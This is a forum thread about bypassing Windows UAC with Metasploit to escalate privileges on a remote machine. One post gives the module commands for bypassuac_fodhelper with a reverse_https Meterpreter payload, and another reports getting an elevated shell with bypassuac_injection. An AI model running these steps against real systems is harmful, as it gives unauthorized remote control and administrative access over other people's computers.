Jump to content

BypassUAC over wan metasploit


p.c00d3r

Recommended Posts

If you're unable to bypass UAC through msf, 9/10 you'll have to gain physical access to escalate privs.

What windows version are you testing this on? I can try and see if I can find a work-around without physical access.

Link to comment
Share on other sites

WINDOWS 10 x64. I tried bypassuac_injection/bypassuac_fodhelper/bypassuac_injection_xSS. May be I tried the wrong commands.

use windows/local/bypassuac_fodhelper
set SESSION
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set LPORT
run

Link to comment
Share on other sites

Hey, so I was I able to escalate privs (on a Windows 8 x86 machine; I don't have a windows 10 test machine yet ....) by using "bypassuac_injection" and instantly obtained a rooted shell. I wasn't able to find the "bypassuac_injection_xSS" in msf and fodhelper isn't useful as the target machine isn't vulnerable to it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...